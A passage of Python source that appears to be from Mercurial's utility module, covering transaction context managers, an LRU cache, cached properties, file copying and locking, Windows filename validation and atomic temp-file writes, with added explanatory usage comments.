    __metaclass__ = abc.ABCMeta

    @abc.abstractmethod
    def close(self):
        """Successfully closes the transaction."""

    @abc.abstractmethod
    def release(self):
        """Marks the end of the transaction.

        If the transaction has not been closed, it will be aborted.
        """

    def __enter__(self):
        return self

    def __exit__(self, exc_type, exc_val, exc_tb):
        try:
            if exc_type is None:
                self.close()
        finally:
            self.release()

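# Sketch of a transactional subclass used as a context manager (comments
# only; 'filetx' is a hypothetical example, not a Mercurial type). On a
# clean exit __exit__ calls close(); on an exception it skips close() and
# release() is expected to abort the pending work.
#
#   class filetx(transactional):
#       def __init__(self, path):
#           self.path, self.done = path, False
#       def close(self):
#           self.done = True          # commit
#       def release(self):
#           if not self.done:
#               pass                  # abort/cleanup would go here
#
#   with filetx(b'data') as tx:
#       ...  # work inside the transaction
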
@contextlib.contextmanager
def acceptintervention(tr=None):
    """A context manager that closes the transaction on InterventionRequired

    If no transaction was provided, this simply runs the body and returns
    """
    if not tr:
        yield
        return
    try:
        yield
        tr.close()
    except error.InterventionRequired:
        tr.close()
        raise
    finally:
        tr.release()

@contextlib.contextmanager
def nullcontextmanager():
    yield

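# Illustrative use of acceptintervention (comments only; 'repo' is a
# hypothetical repository object). Unlike a plain transaction context,
# raising InterventionRequired commits the work done so far instead of
# rolling it back, so the user can fix things up and resume:
#
#   with acceptintervention(repo.transaction(b'rebase')):
#       ...  # may raise error.InterventionRequired
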
class _lrucachenode(object):
    """A node in a doubly linked list.

    Holds a reference to nodes on either side as well as a key-value
    pair for the dictionary entry.
    """
    __slots__ = (u'next', u'prev', u'key', u'value', u'cost')

    def __init__(self):
        self.next = None
        self.prev = None

        self.key = _notset
        self.value = None
        self.cost = 0

    def markempty(self):
        """Mark the node as emptied."""
        self.key = _notset
        self.value = None
        self.cost = 0

class lrucachedict(object):
    """Dict that caches most recent accesses and sets.

    The dict consists of an actual backing dict - indexed by original
    key - and a doubly linked circular list defining the order of entries in
    the cache.

    The head node is the newest entry in the cache. If the cache is full,
    we recycle head.prev and make it the new head. Cache accesses result in
    the node being moved to before the existing head and being marked as the
    new head node.

    Items in the cache can be inserted with an optional "cost" value. This is
    simply an integer that is specified by the caller. The cache can be queried
    for the total cost of all items presently in the cache.

    The cache can also define a maximum cost. If a cache insertion would
    cause the total cost of the cache to go beyond the maximum cost limit,
    nodes will be evicted to make room for the new node. This can be used
    to e.g. set a max memory limit and associate an estimated bytes size
    cost to each item in the cache. By default, no maximum cost is enforced.
    """
    def __init__(self, max, maxcost=0):
        self._cache = {}

        self._head = head = _lrucachenode()
        head.prev = head
        head.next = head
        self._size = 1
        self.capacity = max
        self.totalcost = 0
        self.maxcost = maxcost

    def __len__(self):
        return len(self._cache)

    def __contains__(self, k):
        return k in self._cache

    def __iter__(self):
        # We don't have to iterate in cache order, but why not.
        n = self._head
        for i in range(len(self._cache)):
            yield n.key
            n = n.next

    def __getitem__(self, k):
        node = self._cache[k]
        self._movetohead(node)
        return node.value

    def insert(self, k, v, cost=0):
        """Insert a new item in the cache with optional cost value."""
        node = self._cache.get(k)
        # Replace existing value and mark as newest.
        if node is not None:
            self.totalcost -= node.cost
            node.value = v
            node.cost = cost
            self.totalcost += cost
            self._movetohead(node)

            if self.maxcost:
                self._enforcecostlimit()

            return

        if self._size < self.capacity:
            node = self._addcapacity()
        else:
            # Grab the last/oldest item.
            node = self._head.prev

        # At capacity. Kill the old entry.
        if node.key is not _notset:
            self.totalcost -= node.cost
            del self._cache[node.key]

        node.key = k
        node.value = v
        node.cost = cost
        self.totalcost += cost
        self._cache[k] = node
        # And mark it as newest entry. No need to adjust order since it
        # is already self._head.prev.
        self._head = node

        if self.maxcost:
            self._enforcecostlimit()

    def __setitem__(self, k, v):
        self.insert(k, v)

    def __delitem__(self, k):
        self.pop(k)

    def pop(self, k, default=_notset):
        try:
            node = self._cache.pop(k)
        except KeyError:
            if default is _notset:
                raise
            return default
        value = node.value
        self.totalcost -= node.cost
        node.markempty()

        # Temporarily mark as newest item before re-adjusting head to make
        # this node the oldest item.
        self._movetohead(node)
        self._head = node.next

        return value

    # Additional dict methods.

    def get(self, k, default=None):
        try:
            return self.__getitem__(k)
        except KeyError:
            return default

    def peek(self, k, default=_notset):
        """Get the specified item without moving it to the head

        Unlike get(), this doesn't mutate the internal state. But be aware
        that it doesn't mean peek() is thread safe.
        """
        try:
            node = self._cache[k]
            return node.value
        except KeyError:
            if default is _notset:
                raise
            return default

    def clear(self):
        n = self._head
        while n.key is not _notset:
            self.totalcost -= n.cost
            n.markempty()
            n = n.next

        self._cache.clear()

    def copy(self, capacity=None, maxcost=0):
        """Create a new cache as a copy of the current one.

        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev

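# A short sketch of lrucachedict behavior (comments only, not executed):
#
#   d = lrucachedict(2)
#   d[b'a'] = 1
#   d[b'b'] = 2
#   d[b'a']            # touch 'a' so 'b' becomes the oldest entry
#   d[b'c'] = 3        # capacity exceeded; evicts 'b'
#   b'b' in d          # -> False
#
# With costs, eviction is driven by the total cost instead of entry count:
#
#   d = lrucachedict(10, maxcost=100)
#   d.insert(b'x', 'x', cost=60)
#   d.insert(b'y', 'y', cost=60)   # total cost 120 > 100; evicts 'x'
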
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:
        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]
    else:
        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f

class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__
    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value

def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]

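# How propertycache works, as a sketch (comments only). The descriptor runs
# the wrapped function once, then stores the result in the instance __dict__
# under the same name, so later lookups bypass the descriptor entirely.
# 'computevalue' is a hypothetical helper.
#
#   class repoish(object):
#       @propertycache
#       def expensive(self):
#           return computevalue()       # runs only once per instance
#
#   r = repoish()
#   r.expensive                         # computed and cached
#   r.expensive                         # plain attribute lookup now
#   clearcachedproperty(r, b'expensive')  # force recomputation
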
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''
    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield ''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield ''.join(buf)

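# Sketch of the chunk-growth behavior (comments only): small incoming
# pieces are coalesced, and the minimum emitted size doubles per chunk.
#
#   pieces = [b'x' * 512] * 100
#   sizes = [len(c) for c in increasingchunks(iter(pieces), min=1024)]
#   # sizes grow roughly 1024, 2048, 4096, ... capped at 65536
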
def always(fn):
    return True

def never(fn):
    return False

def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7. But it still affects
    CPython's performance.
    """
    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()
    return wrapper

if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x

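# Typical use is as a decorator around functions that build large
# containers (sketch only; 'buildmap' is a hypothetical example):
#
#   @nogc
#   def buildmap(entries):
#       return dict((e, True) for e in entries)
#
# The previous GC state is restored even if the function raises.
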
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = '/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split('/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join((['..'] * len(a)) + b) or '.'

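# Worked example (comments only; POSIX paths, so os.sep is '/'):
#
#   pathto(b'/repo', b'src/lib', b'doc/readme')
#   # no common prefix between n1 and n2, so walk up twice and back down:
#   # -> '../../doc/readme'
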
# the location of data files matching the source code
if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
    # executable version (py2exe) doesn't support __file__
    datapath = os.path.dirname(pycompat.sysexecutable)
else:
    datapath = os.path.dirname(pycompat.fsencode(__file__))

i18n.setdatapath(datapath)

def checksignature(func):
    '''wrap a function with code to check for calling errors'''
    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
                raise error.SignatureError
            raise
    return check

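# Sketch of what checksignature distinguishes (comments only): a TypeError
# raised by the call itself (traceback depth 1) becomes SignatureError,
# while a TypeError raised deeper inside the function propagates unchanged.
#
#   def greet(name):
#       return b'hi ' + name
#   greet = checksignature(greet)
#   greet()        # raises error.SignatureError (wrong arity)
#   greet(42)      # raises TypeError from inside the body
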
# a whitelist of known filesystems where hardlinks work reliably
_hardlinkfswhitelist = {
    'apfs',
    'btrfs',
    'ext2',
    'ext3',
    'ext4',
    'hfs',
    'jfs',
    'NTFS',
    'reiserfs',
    'tmpfs',
    'ufs',
    'xfs',
    'zfs',
}

def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (
                        oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(str(inst))

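# Usage sketch (comments only; paths are hypothetical). With hardlink=True
# the link is only attempted on whitelisted filesystems and silently falls
# back to a real copy otherwise:
#
#   copyfile(b'.hg/store/data.i', b'backup/data.i', hardlink=True)
#   copyfile(b'a.txt', b'b.txt', copystat=True)   # preserve atime/mtime too
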
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _('linking') if hardlink else _('copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (os.stat(src).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (os.stat(os.path.dirname(src)).st_dev ==
                        os.stat(os.path.dirname(dst)).st_dev)
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num

_winreservednames = {
    'con', 'prn', 'aux', 'nul',
    'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
    'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
}
_winreservedchars = ':*?"<>|'
def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith('\\'):
        return _("filename ends with '\\', which is invalid on Windows")
    if '\\/' in path:
        return _("directory name ends with '\\', which is invalid on Windows")
    for n in path.replace('\\', '/').split('/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return _("filename contains '%s', which is reserved "
                         "on Windows") % c
            if ord(c) <= 31:
                return _("filename contains '%s', which is invalid "
                         "on Windows") % stringutil.escapestr(c)
        base = n.split('.')[0]
        if base and base.lower() in _winreservednames:
            return _("filename contains '%s', which is reserved "
                     "on Windows") % base
        t = n[-1:]
        if t in '. ' and n not in '..':
            return _("filename ends with '%s', which is not allowed "
                     "on Windows") % t

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    timer = time.clock
else:
    checkosfilename = platform.checkosfilename
    timer = time.time

if safehasattr(time, "perf_counter"):
    timer = time.perf_counter

def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError: # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)

def readlock(pathname):
    try:
        return readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError: # no symlink in os
        pass
    with posixfile(pathname, 'rb') as fp:
        return fp.read()

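# Paired usage sketch (comments only; payload and path are hypothetical).
# On symlink-capable systems the lock info lives in the link target,
# elsewhere in the file contents, and readlock() handles both cases:
#
#   makelock(b'myhost:12345', b'.hg/store/lock')
#   readlock(b'.hg/store/lock')   # -> b'myhost:12345'
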
def fstat(fp):
    '''stat file object that may not have fileno method.'''
    try:
        return os.fstat(fp.fileno())
    except AttributeError:
        return os.stat(fp.name)

# File system features

def fscasesensitive(path):
    """
    Return true if the given path is on a case-sensitive filesystem

    Requires a path (like /foo/.hg) ending with a foldable final
    directory component.
    """
    s1 = os.lstat(path)
    d, b = os.path.split(path)
    b2 = b.upper()
    if b == b2:
        b2 = b.lower()
    if b == b2:
        return True # no evidence against case sensitivity
    p2 = os.path.join(d, b2)
    try:
        s2 = os.lstat(p2)
        if s2 == s1:
            return False
        return True
    except OSError:
        return True

try:
    import re2
    _re2 = None
except ImportError:
    _re2 = False

class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = '(?i)' + pat
            if flags & remod.MULTILINE:
                pat = '(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape

re = _re()

_fspathcache = {}
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''
    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly.
    seps = seps.replace('\\', '\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return ''.join(result)
2005
2011
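# Illustrative usage (a sketch, not part of the original module; the paths
# are hypothetical): on a case-insensitive filesystem that stores
# ``Foo/README.txt`` under the normcase-ed root ``/repo``, the lookup
# recovers the on-disk spelling:
#
#   >>> fspath(b'foo/readme.txt', b'/repo')
#   'Foo/README.txt'
#
# Both arguments must already be normcase-ed; on case-sensitive filesystems
# the directory listings are pure overhead, hence the warning above.
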
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(prefix='.%s-' % os.path.basename(testfile),
                                  suffix='1~', dir=os.path.dirname(testfile))
        os.close(fd)
        f2 = '%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass

def endswithsep(path):
    '''Check whether path ends with os.sep or os.altsep.'''
    return (path.endswith(pycompat.ossep)
            or pycompat.osaltsep and path.endswith(pycompat.osaltsep))

def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because it is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)

def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents as the file at name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, "rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, "wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except: # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp

class filestat(object):
    """Helper to exactly detect changes of a file

    The 'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists. Otherwise, it is None. This avoids a preparatory
    'exists()' examination on the client side of this class.
    """
    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (self.stat.st_size == old.stat.st_size and
                    self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
                    self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means the stat of a file at the N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more
        within the same second (= S[n-1].ctime), so comparison of
        timestamps is ambiguous.

        The basic idea to avoid such ambiguity is "advance mtime by 1
        sec if the timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because a naturally advanced S[n].mtime in case (*1)
        might be equal to a manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid changes
        being overlooked due to collisions between such mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of the file hasn't changed.
        """
        try:
            return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change the file stat of the specified path to avoid ambiguity

        'old' should be the previous filestat of 'path'.

        Avoiding ambiguity is skipped if the process doesn't have
        appropriate privileges for 'path'; this returns False in that
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on a file created by another user causes EPERM,
                # if the process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other

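# A worked example of the ambiguity rule above (a sketch, not part of the
# original module; the path is hypothetical): two writes landing in the same
# second can leave size, ctime and mtime all equal, so __eq__ alone cannot
# see the second write. avoidambig() nudges mtime forward to break the tie:
#
#   old = filestat.frompath(b'cachefile')
#   # ... b'cachefile' is rewritten within the same second ...
#   new = filestat.frompath(b'cachefile')
#   if new.isambig(old):
#       new.avoidambig(b'cachefile', old)   # sets mtime to old mtime + 1
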
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat, and
    is useful only if the target file is guarded by a lock (e.g. repo.lock
    or repo.wlock).
    '''
    def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
        self.__name = name # permanent name
        self._tempname = mktempcopy(name, emptyok=('w' in mode),
                                    createmode=createmode,
                                    enforcewritable=('w' in mode))

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'): # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()

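# Illustrative usage (a sketch, not part of the original module; the file
# name and payload are hypothetical): the context-manager form makes the
# rename-on-success behavior explicit:
#
#   with atomictempfile(b'somefile', mode='wb') as fp:
#       fp.write(b'new content\n')
#   # on normal exit the temporary copy has replaced b'somefile';
#   # if the block raises, the copy is discarded and b'somefile' is intact
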
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass

def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise

def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
